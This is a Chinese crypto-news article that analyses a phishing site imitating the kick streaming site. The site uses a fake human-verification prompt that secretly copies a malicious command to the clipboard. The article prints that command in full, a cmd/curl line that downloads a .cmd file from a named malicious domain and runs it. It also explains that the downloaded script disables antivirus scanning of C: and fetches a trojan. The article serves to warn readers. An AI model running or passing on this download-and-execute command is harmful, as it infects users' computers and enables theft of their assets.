钓鱼!钓鱼!又见钓鱼木马!!!
上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。
如上聊天记录所示,他当时是访问了一个假的 kick 网站,网址如下:https://kick.com.im/
重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!
当我们访问此网站时,发现会出现一个是否是人类的验证,我们点击进行验证,会弹出以下提示:
我们来解释上图是让你做什么操作:
1、按下 Windows R 打开运行对话框
Windows R 是 windows 系统下的一个快键命令,用来快速的打开运行对话框的。此处就是让你准备执行恶意脚本文件。
2、按下 CTRL V 粘贴验证文本
地球人都知道 CTRL V 是用来粘贴的,在这一步大家是不是有个疑问,想 CTRL V 之前得先 CTRL C 进行复制呀,为什么没有复制直接就让粘贴了呢?
我们看看钓鱼网站前端的代码:
秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段 js 代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中,这时候不用 CTRL C 就能直接 CTRL V 了。
那粘贴板中的恶意代码是什么呢?
cmd /c "curl -k -L -Ss https://hcaptcha.ru/r-o "%TEMP% 1.cmd" && "%TEMP% 1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
上面的代码意思是从 https://hcaptcha.ru/r(重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“ 1.cmd”,然后执行此文件。
打开下载后的文件发现是如下的代码:
这段恶意代码首先会检查是否有管理员权限,当有管理员权限后会尝试将此脚本提升为管理员权限 。
第二部分那一坨代码用 Base 64 进行了编码,当解码后发现功能是将 C:排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”,这样当木马在 C 盘执行时就不会被杀毒软件发现。
第三部分代码 gpt 也没有解析出来,大致的用处就是从某一网站上下载木马到 C 盘,然后执行木马,这里就需要 @evilcos老师等各位安全专家进行具体的分析。
针对上述钓鱼骗局我们可以得到如下的经验 :
1、访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了 kick 直播的网址,kick 的官方网址是 https://kick.com/,如果受害者去 google 上搜索或者询问 gpt 也就不会上当。
2、执行每一步操作前都要慎重,要想明白这步操作的用处是什么,当我们不懂或者不清楚时,要善于用 GPT 等 AI 工具。
Web3处处是陷阱,希望大家都能避开各种坑。
1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险
2.本文版权归属原作所有,仅代表作者本人观点,不代表本站的观点或立场
您可能感兴趣
-
BOB与LayerZero强强联合,一键解锁原生BTC在多链生态的访问能力,覆盖以太坊、Avalanche、BNB等11条链上近1.5万款Dapp
通过将原生比特币接入LayerZero的wBTC.OFT标准,BOB Gateway为11条主流公链解锁比特币流动性及收益机会。9月30日——BOB(Build on Bitcoin)宣布正式推出首个
-
链上支付是未来趋势,Star首次全景分享OKX Pay愿景
OKX 在 Token2049 峰会前夕宣布推出自托管加密支付产品 OKX Pay,通过在新加坡市场率先落地,用户可享受稳定币支付、4%年化收益及消费返现等功能,旨在打造一个全球化、低成本、高效率的链
-
链上支付是未来趋势,Star 首次全景分享 OKX Pay 愿景
在 9 月 30 日 Token2049 峰会前夕,OKX 举办的 Alphas Summit「The New Money Era」成为了行业热门活动之一。OKX 创始人兼 CEO Star Xu、O
-
市场不好看看 Plasma 挖矿,怎么挖合适?
Plasma的千万美元补贴。撰文:BUBBLE,律动9 月 25 日,市场瞩目的 Plasma 原生代币 XPL 上线,开盘后一度涨至 1.6 美元,除了参与预售的人,一开始存款的人也收到了大量空投奖
-
如何在跑会期间高效 Social?
对他人展现真诚兴趣,人们会记住你带给他们的感受。撰文:Carlitosway编译:Luffy,Foresight News人们记住的是你的气场,而非你的演示文稿。只要掌握正确的参与方式,无需刻意追逐,
-
认识一下特朗普的「影子首相」,重塑美国计划的总设计师
Miller是唯一一位在特朗普首个任期后仍与其保持密切关系,并在今年1月跟随其重返椭圆形办公室的高级幕僚。撰文:董静,华尔街见闻在特朗普第二任期的权力版图中,一个名字正在华盛顿引发越来越多的关注——S
-
国庆假期都有哪些打新机会?
SUI投资的SUI生态项目、传统机构背景的4亿美元融资项目、Legion和Karken首次合作发射项目,这个国庆有点热闹?撰文:BUBBLE近一个月,大项目像是约好了的似的都决定在 9、10 月启动项
-
从 AMM 到 CLOB:将纳斯达克带入链上的 7 万亿美元竞赛
CLOB 不是为了取代 AMM,而是在链上构建适合传统市场的复杂金融基础设施。撰文:A1 Research编译:AididiaoJP,Foreight News从 AMM 到 CLOB:将纳斯达克带入
- 成交量排行
- 币种热搜榜
